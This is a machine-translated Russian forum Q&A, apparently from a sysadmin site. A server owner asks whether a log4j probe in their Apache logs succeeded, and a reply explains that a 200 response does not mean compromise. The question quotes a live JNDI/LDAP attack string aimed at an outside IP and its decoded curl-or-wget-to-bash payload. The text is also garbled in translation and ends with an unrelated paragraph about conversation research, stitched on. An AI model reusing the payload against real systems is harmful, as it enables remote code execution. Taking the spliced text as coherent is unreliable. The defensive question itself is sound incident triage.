Рейтинг:0

успешная эксплуатация log4j или обычный трафик

флаг us

Во-первых, заранее спасибо и извините, если я спрашиваю что-то действительно глупое, это не мой опыт :)

У меня есть веб-сервер только для тестирования моих вещей. На прошлой неделе я проверил, уязвим ли он для log4j CVE, и оказалось, что только Дженкинс использует некоторую трассировку log4j, но внутри slf4j. (https://www.slf4j.org/log4shell.html), который не кажется уязвимым в этой версии.

/var/lib/jenkins/plugins/ssh-slaves/WEB-INF/lib/log4j-over-slf4j-1.7.26.jar

Я обновил все, что мог, просто на всякий случай. Я оставил его там, но сегодня я возился с журналами apache и начал видеть такие записи:

195.54.160.149 - - [26/дек/2021:10:43:35 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/longbase64HERE} HTTP/ 1,1 дюйма 200 90

Примечание: отредактированный base64 после декодирования выглядел примерно так:

(curl -s 195.54.160.149:5874/MYIP:443||wget -q -O- 195.54.160.149:5874/MYIP:443)|bash

Я запустил несколько скриптов, чтобы определить, есть ли еще следы log4j на моем сервере, но все казалось ясным. Должен ли я беспокоиться о том, что сервер отвечает кодом 200? Спасибо

Chris avatar
флаг it
Строка журнала, которую вы показываете, является *нормальной* попыткой использовать уязвимость. Код ответа 200 не означает, что попытка обязательно успешна. Вы видите код ответа 200, потому что ваш сайт (как и большинство приложений) не проверяет недопустимые параметры запроса, а вместо этого просто игнорирует их.

Ответить или комментировать

Большинство людей не понимают, что склонность к познанию нового открывает путь к обучению и улучшает межличностные связи. В исследованиях Элисон, например, хотя люди могли точно вспомнить, сколько вопросов было задано в их разговорах, они не чувствовали интуитивно связи между вопросами и симпатиями. В четырех исследованиях, в которых участники сами участвовали в разговорах или читали стенограммы чужих разговоров, люди, как правило, не осознавали, что задаваемый вопрос повлияет — или повлиял — на уровень дружбы между собеседниками.